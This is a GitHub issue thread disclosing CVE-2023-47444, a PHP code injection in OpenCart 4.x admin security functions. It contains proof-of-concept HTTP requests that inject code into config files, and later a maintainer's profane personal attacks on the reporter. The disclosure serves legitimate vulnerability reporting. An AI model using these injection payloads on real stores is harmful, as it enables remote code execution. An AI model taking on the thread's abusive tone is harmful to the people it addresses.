### ISSUE TITLE
Static Code Injections in OpenCart (CVE-2023-47444)

### ISSUE THREAD

**Issue by 0xb120** [opencart/opencart#12947]
**What version of OpenCart are you reporting this for?**
OpenCart versions 4.0.0.0 to 4.0.2.3

**Describe the bug**
There are two distinct static code injection vulnerabilities in the function that moves the storage folder outside the application web root, and the function that renames the secret admin path after the installation. While the latter can be exploited only if the admin folder has not yet been renamed, the former can be exploited anytime, even if the storage folder has already been moved. Both vulnerabilities require that the user has the common/security “access” and “modify” privileges enabled. Exploiting them, an authenticated adversary can inject arbitrary static PHP code that will be executed by every page, resulting in arbitrary remote code execution. Those vulnerabilities were both introduced from OpenCart 4.0.0.0 onward.

The storage() function in upload/admin/controller/common/security.php is vulnerable to PHP static code injection because $name and $path user-controlled variables are concatenated and placed inside $base_new, which is then written inside the config.php and admin/config.php files, without proper escape or validation.

The admin() function in upload/admin/controller/common/security.php is vulnerable to PHP static code injection because $name user-controlled variable is placed inside $base_new, which is then written inside a new config.php file, without proper escape or validation.

**To Reproduce**
Refer to the following article: https://0xbro.red/disclosures/disclosed-vulnerabilities/opencart-cve-2023-47444/#vulnerabilities-details-and-root-causes

**PoC for common/security.storage**:
Request 1:
```http
GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

--- RESPONSE ---

HTTP/1.1 200 OK

{"next":"http:\/\/127.0.0.1:8888\/admin_secret\/index.php?route=common\/security.storage&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&name=pwned');phpinfo();#&path=\/home\/kali\/Projects\/OpenCart\/4.0.2.3\/&page=2"}
```
Request 2:
```http
GET /admin_secret/index.php?route=common/security.storage&name=pwned');phpinfo();%23&path=/home/kali/Projects/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&page=99 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

--- RESPONSE ---

HTTP/1.1 200 OK

{"success":"Success: Storage directory has been moved!"}
```

**PoC for common/security.admin**:
Request 1:
```http
GET /admin/index.php?route=common/security.admin&user_token=7cc69dfa3112eb181c75da78147d8af1&page=1&name=foo%27);phpinfo();print(%27 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

--- RESPONSE ---

HTTP/1.1 200 OK

{"next":"http:\/\/127.0.0.1:8888\/admin\/index.php?route=common\/security.admin&user_token=7cc69dfa3112eb181c75da78147d8af1&name=foo');phpinfo();print('&page=2"}
```

Request 2:
```http
GET /admin/index.php?route=common/security.admin&user_token=7cc69dfa3112eb181c75da78147d8af1&page=99&name=foo%27);phpinfo();print(%27 HTTP/1.1
Host: 127.0.0.1:8888
Cookie: OCSESSID=fbc47c7e5098550f0c12070be0

--- RESPONSE ---

HTTP/1.1 200 OK

{"redirect":"http:\/\/127.0.0.1:8888\/foo');phpinfo();print('\/index.php?route=common\/login"}
```

**Expected behavior**
User input should be sanitized, removing undesired dangerous characters.

**Screenshots / Screen recordings**
https://youtu.be/auTky_gm8Rk
https://youtu.be/6if6Kfsb2oM

**Comment by mhcwebdesign** [comment]
Why don't you create a pull-request, with some modified code for the 'admin/controller/common/security.php'? Should be easily fixed. 

Anyway, it's not a high security risk because the normal end users aren't store administrators, so I won't have sleepless nights over this.

**Comment by mips171** [comment]
Normal end user's aren't admins, but anyone using session fixation/hijacking can steal an admin's account then do this. With the amount of live installations OpenCart has, actual exploits in the wild is merely numbers game at this point.

**Comment by mips171** [comment]
By the way, I'm not selling anything. I was a customer of OpenCart before discovering it's not fit for purpose.

**Comment by danielkerr** [comment]
> Normal end user's aren't admins, but anyone using [session fixation/hijacking](https://github.com/opencart/opencart/issues/12939) can steal an admin's account then do this. With the amount of live installations OpenCart has, actual exploits in the wild is merely numbers game at this point.

And banned

**Comment by danielkerr** [comment]
im going to put some additional checks on this but seems not really a hack since u need access to the admin and permission to change the storage folder. just another clown \. getting borded of these clowns!

**Comment by danielkerr** [comment]
as u said needs permssion. so this is like a word game of what if. what if no permission, what if user_token was given away or what if u could see the datatabase cooke tokens, etc.. 

[mips171](https://github.com/mips171) and [0xb120](https://github.com/0xb120)

JUST FUCK OFF!

**Comment by 0xb120** [comment]
You are taking for granted that end users in the "admin" area are all admins, but it is not always true in other installations. I tested different versions of OpenCart for some clients I work for, where they created multiple "sales" users with different roles, which were not admins but only non-technical people with an account provided to update price info and products. Upset employees, phished users, XSS, etc. are all possibilities that make the exploitation feasible in this case and allow unauthorized users (the sales guys or whoever uses their account) to execute arbitrary commands on the server, which should never be the case.

I don't want to create beef or upset anyone, I just wanted to report what to me looked like an unintended dangerous behavior.

For the fix, I think that patching the misconfigured regexes (pull request #12949 ) should do the trick without adding any new checks, but I'm not 100% sure about that.

**Comment by danielkerr** [comment]
Il not into what if's! U have posted a something that is not a requires access and permissions. The fucking demo has been there and I don't see people accessing anything they shouldn't

**Comment by danielkerr** [comment]
0xb120 u don't listen. U have proved nothing! All u have done is advertised a non vunribilty at the top of my project issue list!  U can't even do anything unless u already have permission to do it. What the fuck is wrong with u. Do u have some narasasium problem where u want to be the centre of attention where people are asking u what should we do to fix it. Are u building up a resume for a job? Oh I found this is issue and reported it on the cve but for got to tell everyone u need permission for it to work! Ur Fucking delusional! Ur not smart enough to be a programmer or a hacker. Take this statement from somebody who has actually made a name for themselves in the programming and e-commerce marketplace. Something u will never achieve!

**Comment by danielkerr** [comment]
Will be replying to this shortly

**Comment by danielkerr** [comment]
This is a reply to https://www.theregister.com/2023/11/24/opencart_vulnerability_dispute/

The Register seems to suffer from what many in the media do, which are lazy reporters. The register has not done its own research or even asked questions about what is being claimed. 

“He who makes the claim carries the burden of proof!” 

Should the question not have been asked, if the hacker has access to the admin and permissions to modify the security, then is it really a hack?

Same with the CVS report. They don't check that what is being reported is actually a vulnerability.

I don't want to link to this guy's site because he's a conman trying to get recognition for his fantasy.

https://0xbro.red/disclosures/disclosed-vulnerabilities/opencart-cve-2023-47444/

I don't even want to have to reply to this nonsense as I’m busy actually doing work!!

 0xb120 even admits this:

“In OpenCart versions 4.0.0.0 to 4.0.2.3, authenticated backend users having common/security “access” and “modify” privileges can write arbitrary untrusted data inside config.php and admin/config.php, resulting in remote code execution on the underlying server.”

He's saying that for this vulnerability to work access and modify privileges. So why would you give permission to a low level user the ability to rename a directory? Another point is that said functionality to rename the directory is removed once you click the move storage directory!

Reasons that Authenticated Static Code Injections in OpenCart (CVE-2023-47444) not can be carried out:

Hackers need to know the admin name - If the default admin folder name is admin then when the user visits the opencart dashboard a security popup comes up telling the user to rename the admin directory.  

Hackers need access to the admin - So first your hacker will need access to the opencart admin by having the username and password. There is also the optional 2 factor auth also that can be enabled. 

Hackers need permission to view or modify - So not only does the hacker need a login but also needs a login with permission to modify the security popup.

Security popup - The security popup only works if the installation directory exists, storage path is in the web root or if the admin is named “admin”. If you have just begun to set up an opencart site then you would need to follow the security popup instructions to make your site secure. The security popup should not show up on a production site if you have followed the instructions.

It is quite clear that the security popup tells you that your site will be vulnerable to hacking if the opencart installation admin is not renamed, that the installation directory is not deleted and the storage folder is not moved!

It was also reported that I later merged a fix that fixes the alleged hack:

https://github.com/opencart/opencart/pull/12951

If you haven't followed the security instructions then there's a lot more security issues like the storage directory being exposed. 

The fact that this guy claims he worked on the vulnerability for a month yet still can not pull it off without the end user giving him access to the site shows that opencart is very secure or this guy is completely useless at his job. 

I got called a narcissist but I'm not the one making up claims. 0xb120 is trying to craft a narrative that makes him look like a hero! Who's the narcissist ! I didn’t contact him! 

What a clown!~

OpenCart is currently at 298,000 Live sites! We have dropped a bit from 450,000 but the whole market has since COVID and the war in Ukraine.  

The register also makes claims about my competitors:

Woocommerce - I have spoken with woo commerce a while ago and it seems u are confusing woocommerce with wordpress. Wordpress has over 1 million sites but they are a blogging platform. Woocommerce has very low numbers. 

Same with Squarespace. 

Magento has 160,000 live sites which is half of OpenCart and they got bought for 1.6 billion. 

Shoppify overtook OpenCart in Sept 2017 after getting billions in investment. They are also not open source and you can't access their code base!


P.S

Also If anyone is looking for a good story I know a very good one that involves child traffickers, judges and police. It will make your blood boil!

**Comment by danielkerr** [comment]
All 0xb120 did was fix a bug. On something that can only happen if u have not followed the security instructions on the admin dashboard as soon as u login!

It says click button to move storage feild when the storage folder is in the wrong area when u login. Once u click the button no one can hack the system. There's a big security message on the dashboard. By the way if u don't move the storage folder the whole site can be hacked anyway and code uploaded.

another big point here: what do u want me to do about it? 

send an email out to all my customers telling them about a vulnerability that will never effect them because they allow clicked the move storage folder button when they first logged in? 

Do I go round demanding people praise me and exaggerating everything to get my name in the papers. It's fucking sad! as i said in the past they are clowns!
